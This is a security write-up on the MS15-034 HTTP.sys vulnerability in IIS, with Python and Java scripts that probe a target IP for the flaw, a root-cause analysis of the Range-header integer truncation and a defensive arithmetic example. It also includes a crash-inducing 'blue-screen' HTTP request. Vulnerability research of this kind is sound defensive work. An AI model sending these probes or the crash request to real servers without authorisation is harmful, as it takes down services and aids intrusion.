0. Core part of the MS15-034 PoC (adapted from the 巡風 scanner):
import socket

def check_ms15_034(ip, port, timeout=5):
    socket.setdefaulttimeout(timeout)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, int(port)))
    # Range header whose end offset is 2^64-1; the check keys on how the server answers it
    flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
    s.send(flag.encode("ascii"))
    data = s.recv(1024).decode("ascii", errors="replace")
    s.close()
    if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
        print("vuln")
Since I have recently wanted to learn Java, I rewrote a Java version of the code:
/*
 * encoding:utf-8
 * Author:chenran01;
 * Email:crsecscu@gmail.com
 */

//import lib packages
import java.net.Socket;
import java.util.Scanner;
import java.io.*;

//define main class
public class HTTPSYS{
    public static String IP_ADDR = "127.0.0.1";
    public static int PORT = 80;
    public static String Flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
    //Flag is the payload
    public static void main(String[] args){
        System.out.print("Please input target IP:");
        Scanner input = new Scanner(System.in);
        IP_ADDR = input.next();
        System.out.print("Please input target port:");
        try{
            PORT = input.nextInt(); //read the port as an integer, not a single raw byte
        }catch(Exception ex){
            System.out.printf("Error-Reason:%s",ex.toString());
            PORT = 80; //fall back to the default port only when parsing failed
        }
        try{
            Socket socket = new Socket(IP_ADDR,PORT);
            //create socket
            InputStream socketrecv = socket.getInputStream();
            OutputStream socketsend = socket.getOutputStream();
            //create input/output streams
            socketsend.write(Flag.getBytes("US-ASCII"));//send payload as raw bytes (writeUTF would prepend a length prefix)
            socketsend.flush();
            byte[] buf = new byte[1024];
            int n = socketrecv.read(buf);
            String response_content = (n > 0) ? new String(buf, 0, n, "US-ASCII") : "";//read the response
            socket.close();
            if(response_content.indexOf("Server: Microsoft") != -1 && response_content.indexOf("Requested Range Not Satisfiable") != -1){
                System.out.print("Vulnerable");
            }else{
                System.out.print("Not vulnerable");
            }
        }catch(Exception ex){
            System.out.printf("Error-Reason:%s",ex.toString());
        }
    }
}
1. Investigating the root cause of the MS15-034 HTTP.sys vulnerability:
The root-cause analysis references: http://www.ijiandao.com/safe/cto/12821.html
# Example: blue-screen (BSOD) PoC
"""
GET /welcome.png HTTP/1.1
Host: PoC
Range: bytes=12345-18446744073709551615
"""
Here the Range field is handled inside IIS by HTTP!UlBuildFastRangeCacheMdlChain (which builds the cached MDL chain for the response message, describing the status line, headers and body of the HTTP response). That function calls nt!IoBuildPartialMdl to build the MDL chain, and inside that function the value Length is computed:
Note that the documentation explicitly requires the region defined by VirtualAddress and Length to be a sub-range of the buffer described by SourceMdl; violating this requirement is exactly what causes the memory corruption in this vulnerability.
The parameters of the third call to nt!IoBuildPartialMdl, which builds the message-body MDL, are as follows:
SourceMdl = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount = 0x2d315
SourceMdl.ByteOffset = 0x0
TargetMdl = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount = 0xffffcfc7
TargetMdl.ByteOffset = 0x39
VirtualAddress = 0xfffffa801ac97039
Length = 0xffffcfc7
The Length here is computed from the Range field in the HTTP request header, as follows:
First, HTTP!UlpParseRange parses the Range field to obtain RangeBegin and RangeEnd;
Then, RangeLength = RangeEnd - RangeBegin + 1 is computed;
Finally, RangeLength is truncated to 32 bits to obtain Length.
Taking the PoC's Range: bytes=12345-18446744073709551615 as an example:
RangeBegin = 12345 = 0x3039
RangeEnd = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff – 0x00003039 + 1 = 0xffffffffffffcfc7
Length = 0xffffcfc7
Clearly the oversized Length violates the requirement of nt!IoBuildPartialMdl, which results in memory corruption.
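To make the three-step arithmetic above concrete, here is an added Python example; it is not code from the original post or from the referenced analysis. It parses a Range header of the form used by both PoCs on this page, carries out the RangeLength computation and the 32-bit truncation, and then applies the sub-range check that nt!IoBuildPartialMdl requires, using SourceMdl.ByteCount = 0x2d315 from the third call. The function names, the regex-based parser, and the assumption that the partial MDL starts RangeBegin bytes into the source buffer (which matches the addresses quoted above: SourceMdl.VirtualAddress + 0x3039 = VirtualAddress) are mine, not HTTP.sys internals.

```python
# Added example (not part of the original post): reproduces the Range -> Length
# arithmetic described above and checks the sub-range requirement of
# nt!IoBuildPartialMdl against the MDL parameters quoted in the post.
import re

MASK32 = 0xFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF


def parse_range(header):
    """Parse a single 'bytes=begin-end' Range header into (RangeBegin, RangeEnd).

    Only the form used by the PoC is handled (assumption: one range, both ends
    given). The end offset may be any decimal value, as 18446744073709551615
    is accepted by HTTP!UlpParseRange according to the analysis above.
    """
    m = re.fullmatch(r"\s*bytes=(\d+)-(\d+)\s*", header)
    if not m:
        raise ValueError("unsupported Range header: %r" % header)
    return int(m.group(1)), int(m.group(2))


def compute_length(range_begin, range_end):
    """Mirror the post's steps: RangeLength = End - Begin + 1 (64-bit), then truncate to 32 bits."""
    range_length = (range_end - range_begin + 1) & MASK64
    length = range_length & MASK32
    return range_length, length


def partial_mdl_in_bounds(source_byte_count, offset_in_source, length):
    """The requirement quoted above: [offset, offset + length) must lie inside the SourceMdl buffer."""
    return offset_in_source + length <= source_byte_count


def analyse(header, source_byte_count):
    """Return the intermediate values and whether building the partial MDL would stay in bounds.

    source_byte_count is the cached response body size (SourceMdl.ByteCount). The
    partial MDL is assumed to start RangeBegin bytes into that buffer, which matches
    the post's addresses (SourceMdl.VirtualAddress + 0x3039 == VirtualAddress).
    """
    begin, end = parse_range(header)
    range_length, length = compute_length(begin, end)
    return {
        "RangeBegin": begin,
        "RangeEnd": end,
        "RangeLength": range_length,
        "Length": length,
        "truncated": range_length != length,   # 32-bit truncation lost high bits
        "in_bounds": partial_mdl_in_bounds(source_byte_count, begin, length),
    }


if __name__ == "__main__":
    # SourceMdl.ByteCount from the post's third IoBuildPartialMdl call
    SOURCE_BYTE_COUNT = 0x2D315
    for hdr in ("bytes=12345-18446744073709551615",  # the header from the blue-screen PoC
                "bytes=12345-20000"):                 # a constructed, ordinary range
        r = analyse(hdr, SOURCE_BYTE_COUNT)
        print("%-36s RangeLength=%#x Length=%#x truncated=%s in_bounds=%s"
              % (hdr, r["RangeLength"], r["Length"], r["truncated"], r["in_bounds"]))
```

Running it shows the PoC header producing RangeLength 0xffffffffffffcfc7 and Length 0xffffcfc7 exactly as in the post, with the sub-range check failing because 0x3039 + 0xffffcfc7 = 0x100000000 exceeds SourceMdl.ByteCount, while the ordinary range passes both checks. The defensive lesson is the same one the analysis draws: the range arithmetic must be validated against the real buffer size before any partial MDL is built, and a length that changes under 32-bit truncation must be rejected rather than used.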